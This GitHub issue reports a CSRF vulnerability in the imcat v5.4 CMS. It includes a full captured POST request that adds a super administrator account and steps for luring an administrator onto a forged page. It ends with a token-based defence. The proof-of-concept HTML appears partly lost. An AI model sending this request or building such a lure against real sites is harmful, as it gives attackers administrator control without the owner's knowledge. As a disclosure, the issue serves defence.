Skip to content

CSRF vulnerability in imcat v5.4 #9

Open
@haungtongfu

Description

@haungtongfu

1. Overview

Official website: http://txjia.com/imcat/

Version: imcat-5.4

Vulnerability type: CSRF post

Source code: https://github.com/peacexie/imcat/releases/tag/v5.4

Harm: Super administrator account can be added

2. Analysis

2.1 logic analysis

In the add administrator page, the security of data source is not verified by token and referer
image
(1) There is no token used for security verification in the data packet, so there is the possibility of forgery
POST /imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=& HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 539
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=&recbk=ref
Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1622443371; CKFinder_Path=Files%3A%2F%3A1; v49_sessid_4294e52897e5=2021-6b-hg49-yttfxda8f-7e5f79d1a; v49_Uniqueid_01348a66d0e6=2021-6h-a25c-5s8pgxq58-0e63b0fe2; Hm_lpvt_948dba1e5d873b9c1f1c77078c521c89=1622444424; twVscAv_admauth=1606cECE916XO1gVfiR9ahqpqkEJMTxa4R5XjBOh69Cfppjn2zcpGMtx5x7BRkm4L0Vposdev%2B2ydGfzzC3me67ttA1foMK2UXNSybiOLOvH; v49_vcodes=fmadm%3Dnull%0Afmcomadd%3D1623809462%2C49f8c2fc48af351f%0Afmapply%3D1623830847%2C7da4f846fdbd0243%0A; v49_ocar_items=0; PHPSESSID=5b4be5ad4c47747257ac13a5c15265c9
Upgrade-Insecure-Requests: 1

recbk=http%3A%2F%2F127.0.0.1%2Fimcat%2Froot%2Frun%2Fadm.php%3Fdops-a%26mod%3Dadminer&fm%5Buid%5D=2021-6p-j6xk&fm%5Buno%5D=1&fm%5Buname%5D=qwe_123&fm%5Bupass%5D=adm_123&fm%5Bgrade%5D=supper&fm%5Bshow%5D=1&fm%5Bmname%5D=qwe_123&fm%5Bindep%5D=inadm&fm%5Bmiuid%5D=&fm%5Bmtel%5D=12345678091&fm%5Bmemail%5D=23wqw%4022.com&fm%5Bmaddr%5D=&fm%5Batime%5D=2021-06-21+17%3A14%3A49&fm%5Betime%5D=2021-06-21+17%3A14%3A49&fm%5Bauser%5D=adm_123&fm%5Beuser%5D=adm_123&fm%5Baip%5D=127.0.0.1&fm%5Beip%5D=127.0.0.1&bsend=%E6%8F%90%E4%BA%A4&mod=adminer&isadd=1

(2) After deleting the referer: information, you can still add an administrator
image

3. Loophole recurrence

(1) Environment preparation, building environment with phpstudy
image
(2) Construct a payload with the function of creating a super administrator account, qwe_ 123/adm_ one hundred and twenty-three

<script>history.pushState('', '', '/')</script> (3) Through a variety of fishing means to lure the administrator to click on the page, that is, to complete the action of adding super administrator without the administrator's knowledge ![image](https://user-images.githubusercontent.com/58809869/123199520-9c4db300-d4e1-11eb-8c46-94d9a911babe.png) ![image](https://user-images.githubusercontent.com/58809869/123199525-9f48a380-d4e1-11eb-8d18-87c3044191a5.png) ![image](https://user-images.githubusercontent.com/58809869/123199531-a2dc2a80-d4e1-11eb-9df6-fb13551bbcfe.png) ### 4. Verification of attack results

Using qwe_ 123/adm_ 123 login in the background
image

5. Means of Defense

Add a token to the place where important actions are performed for authentication. The value of the token must be random and unpredictable

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions